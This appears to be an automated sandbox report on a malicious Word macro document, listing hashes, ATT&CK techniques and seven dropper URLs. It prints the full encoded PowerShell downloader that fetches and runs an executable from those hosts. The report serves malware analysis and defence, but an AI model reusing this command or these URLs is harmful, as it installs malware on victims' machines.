16b031e38044afa7252dbfb56c762b3723de1cb4b3535a8c76bd5d4f10a2819b

General

Target

b2a4affdcf3d516bda291104f1589f3a_JaffaCakes118.doc
Size

132KB
MD5

b2a4affdcf3d516bda291104f1589f3a
SHA1

0b7eaef417382de23901cfb406e1aa99df2ec1ca
SHA256

16b031e38044afa7252dbfb56c762b3723de1cb4b3535a8c76bd5d4f10a2819b
SHA512

4f1d243a9b29f9029a089434d3152bcdde58d53ba88a524ed8328610562685c94865cd0a412eaa27278d70060afa5aa77611019ce4e7b76eed6e1f14769c2d8c
SSDEEP

1536:TNVLAAAAcAAAAAUmPxwMddylbvuNm9F96qpJWAfjlyqF:TLAAAAcAAAAAUSxRYs4DLlyqF

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trueteeshirt.com/wp-admin/5/

exe.dropper

https://nhaphomau.com/sa7/

exe.dropper

https://heck-electric.com/wp-includes/vUB/

exe.dropper

http://techinotification.com/wp-includes/ii1pd0x/

exe.dropper

http://editzarmy.com/journal/WinEA/

exe.dropper

https://noithatfhouse.com/wp-includes/g5JI21S/

exe.dropper

http://techitrends.com/wp-includes/qO/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	4296	POwersheLL.exe	84

Blocklisted process makes network request 4 IoCs

flow	pid	Process
24	396	POwersheLL.exe
31	396	POwersheLL.exe
35	396	POwersheLL.exe
37	396	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1060	WINWORD.EXE
1060	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
396	POwersheLL.exe
396	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	396	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b2a4affdcf3d516bda291104f1589f3a_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABKADYAZQBvADQAMAA1AD0AKAAoACcAUAB5ACcAKwAnAHgAMQBnACcAKQArACcAeQA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAGUAUgBwAFIAbwBmAGkATABlAFwAQQBiAEMAcQAwAEwANABcAFAARQBpAGsAcAA0AFQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAYABSAGkAYABUAFkAUAByAG8AdABPAGMAYABPAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxADIAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsACcAKwAoACcAcwAxADEALAAnACsAJwAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABYADkAZgAzAG4AeQBlACAAPQAgACgAJwBQACcAKwAoACcAYwBjAGUAcwAnACsAJwB3ACcAKQArACgAJwAyADgAJwArACcAZgAnACkAKQA7ACQASABmAGoANABwAGUAcAA9ACgAJwBMAHQAJwArACgAJwB1ADIAJwArACcAZAAnACkAKwAnAGMAaQAnACkAOwAkAEcAOQA0ADgAawBzAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAKAAnAEUAUgBBACcAKwAnAGIAYwBxACcAKQArACgAJwAwAGwANAAnACsAJwBjAEUAJwApACsAKAAnAFIAUABlAGkAawAnACsAJwBwACcAKwAnADQAJwApACsAKAAnAHQAYwBFACcAKwAnAFIAJwApACkALgAiAHIARQBwAGwAQQBgAGMARQAiACgAKAAnAGMAJwArACcARQBSACcAKQAsACcAXAAnACkAKQArACQAWAA5AGYAMwBuAHkAZQArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFcAawB6AGMAcwA5AGwAPQAoACcAUgBtACcAKwAoACcAMgBvAGQAJwArACcAMgBlACcAKQApADsAJABFAHAAdQBtAGwAdwA2AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMATABJAGUATgBUADsAJABJAHoAcwB1AHkAbQBxAD0AKAAoACcAaAB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB0AHIAdQAnACsAJwBlAHQAZQAnACsAJwBlAHMAJwArACcAaABpACcAKQArACgAJwByAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtAGEAZABtACcAKwAnAGkAJwApACsAKAAnAG4AJwArACcALwA1AC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnAHMAOgAnACsAKAAnAC8ALwBuAGgAYQAnACsAJwBwACcAKQArACgAJwBoAG8AJwArACcAbQBhAHUALgBjAG8AJwApACsAJwBtACcAKwAnAC8AcwAnACsAKAAnAGEANwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBlAGMAJwApACsAJwBrAC0AJwArACgAJwBlAGwAJwArACcAZQAnACsAJwBjAHQAcgAnACkAKwAoACcAaQAnACsAJwBjAC4AYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAoACcAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvAHYAJwArACcAVQAnACkAKwAnAEIAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKQArACgAJwBlACcAKwAnAGMAaAAnACkAKwAoACcAaQBuACcAKwAnAG8AdAAnACsAJwBpAGYAaQBjAGEAdAAnACsAJwBpACcAKQArACgAJwBvACcAKwAnAG4ALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAB1AGQAZQBzACcAKwAnAC8AJwApACsAKAAnAGkAaQAxACcAKwAnAHAAZAAnACkAKwAoACcAMAAnACsAJwB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8ALwAnACsAJwBlAGQAaQB0AHoAYQByACcAKwAnAG0AeQAuACcAKQArACcAYwAnACsAJwBvACcAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAbwB1AHIAJwApACsAKAAnAG4AJwArACcAYQBsAC8AVwAnACkAKwAoACcAaQBuAEUAJwArACcAQQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzACcAKwAnADoALwAvAG4AbwBpAHQAaAAnACsAJwBhACcAKQArACgAJwB0AGYAJwArACcAaABvAHUAcwAnACsAJwBlAC4AYwBvAG0AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQAnACkAKwAnAG4AJwArACgAJwBjACcAKwAnAGwAdQBkAGUAcwAvACcAKQArACcAZwAnACsAKAAnADUASgBJADIAMQBTAC8AKgAnACsAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8AJwArACcALwB0AGUAYwBoAGkAdAAnACsAJwByAGUAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGkAbgBjAGwAdQAnACkAKwAnAGQAZQAnACsAKAAnAHMALwAnACsAJwBxAE8ALwAnACkAKQAuACIAcwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHkAeQB5AHYANABqAD0AKAAoACcASQAnACsAJwB4AGkAJwApACsAJwBsACcAKwAoACcAbgAnACsAJwA3AF8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQADEAMABjAGcAdgBjACAAaQBuACAAJABJAHoAcwB1AHkAbQBxACkAewB0AHIAeQB7ACQARQBwAHUAbQBsAHcANgAuACIARABPAGAAdwBOAGwATwBhAGAARABgAEYAaQBMAGUAIgAoACQAUAAxADAAYwBnAHYAYwAsACAAJABHADkANAA4AGsAcwBkACkAOwAkAFgAagAzAHIAaQBjAHkAPQAoACcAVgAnACsAKAAnAF8AJwArACcAZQAnACsAJwBjAG4AYQByACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEcAOQA0ADgAawBzAGQAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANAAwADkAOQApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABHADkANAA4AGsAcwBkACkAOwAkAEoAcwBwAG8AdQB5AGMAPQAoACgAJwBFACcAKwAnADMANgB6AF8AJwApACsAJwA5ACcAKwAnADUAJwApADsAYgByAGUAYQBrADsAJABUAHIANQAwAHkAMABnAD0AKAAoACcASAA1ACcAKwAnAHcAeQBnACcAKQArACcAZgBsACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA4AGEAbgB1AHcAbgA9ACgAKAAnAFIAJwArACcAcQBjAGwAJwApACsAJwA0ACcAKwAnAHoANgAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDC60E.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pq4axus2.44c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
6ff8e1c1d6203297e2e8a7a9dc1a91a1

SHA1
bc9143e67d3a8d18b91a2567202ca6f53c527a57

SHA256
b08225b8af4644edcdd8f92ee7cb597a36823626d7b5f88b1d2053992f319ff6

SHA512
b5a3b04fe00b2922f883292990be9b1131ec5cd82e25a736d0da16cbf940d2f36392a3b0b5f206b3741b80e9baae9da904b12f413e094f7a491220bfc530770a

Download Submit
memory/396-68-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/396-92-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/396-74-0x000002092D740000-0x000002092D762000-memory.dmp

Filesize
136KB

Download
memory/1060-16-0x00007FFFB2560000-0x00007FFFB2570000-memory.dmp

Filesize
64KB

Download
memory/1060-9-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-15-0x00007FFFB2560000-0x00007FFFB2570000-memory.dmp

Filesize
64KB

Download
memory/1060-13-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-12-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-10-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-8-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-5-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-4-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-3-0x00007FFFF4DED000-0x00007FFFF4DEE000-memory.dmp

Filesize
4KB

Download
memory/1060-23-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-24-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-11-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-14-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-7-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-6-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-1-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-93-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-94-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-0-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-103-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download
memory/1060-2-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-601-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-602-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-604-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-603-0x00007FFFB4DD0000-0x00007FFFB4DE0000-memory.dmp

Filesize
64KB

Download
memory/1060-605-0x00007FFFF4D50000-0x00007FFFF4F45000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads